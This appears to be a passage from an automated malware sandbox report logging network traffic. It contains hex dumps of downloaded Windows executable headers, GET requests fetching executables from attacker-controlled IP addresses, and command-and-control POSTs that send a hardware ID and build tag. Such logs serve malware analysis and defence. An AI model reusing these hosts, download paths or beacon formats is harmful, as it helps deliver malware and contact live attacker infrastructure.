00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 65 01 00 00 40 0d 00 00 66 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:41 GMTContent-Type: application/octet-streamContent-Length: 2915840Last-Modified: Sat, 01 Feb 2025 15:07:28 GMTConnection: keep-aliveETag: "679e38b0-2c7e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 e0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2d 00 00 04 00 00 e1 f8 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 68 77 79 75 6d 75 79 00 20 2c 00 00 a0 00 00 00 20 2c 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 64 68 66 75 77 64 65 00 20 00 00 00 c0 2c 00 00 04 00 00 
00 58 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2c 00 00 22 00 00 00 5c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:50 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 01 Feb 2025 15:09:26 GMTConnection: keep-aliveETag: "679e3926-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 
63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:52 GMTContent-Type: application/octet-streamContent-Length: 1808896Last-Modified: Sat, 01 Feb 2025 15:09:15 GMTConnection: keep-aliveETag: "679e391b-1b9a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 aa c4 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 
40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 7a 69 70 6a 68 72 61 00 00 1a 00 00 60 4f 00 00 f4 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 77 6f 72 65 69 74 71 00 10 00 00 00 60 69 00 00 04 00 00 00 74 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 78 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:54 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 01 Feb 2025 15:09:26 GMTConnection: keep-aliveETag: "679e3926-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 
63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:57 GMTContent-Type: application/octet-streamContent-Length: 3028480Last-Modified: Sat, 01 Feb 2025 15:09:26 GMTConnection: keep-aliveETag: "679e3926-2e3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 32 00 00 04 00 00 3c 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 
63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global traffic | HTTP traffic detected: GET /forsale/infinity.exe HTTP/1.1 | Host: 91.240.118.49
                            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.115 | Connection: Keep-Alive | Cache-Control: no-cache
                            Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAK | Host: 185.215.113.115 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 34 41 46 36 37 39 32 43 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 2d 2d 0d 0a | Data Ascii: ------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="hwid"BD4AF6792CE23924696330------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="build"kira------IEHJDGIDBAAFIDGCGCAK--
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 44 36 36 30 41 39 32 36 42 34 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 | Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FD660A926B464F71F462AE478222FFDED0F8E1F939F
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 31 36 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1061683001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/941767796/ktIplF5.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 30 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062048001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062121001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062122001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062123001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062124001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/sunnywebZ/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062125001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062126001&unit=246122658369
                            Source: global traffic | HTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1 | Host: 185.215.113.97
                            Source: global traffic | HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.43 | Content-Length: 31 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 36 32 31 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=1062127001&unit=246122658369
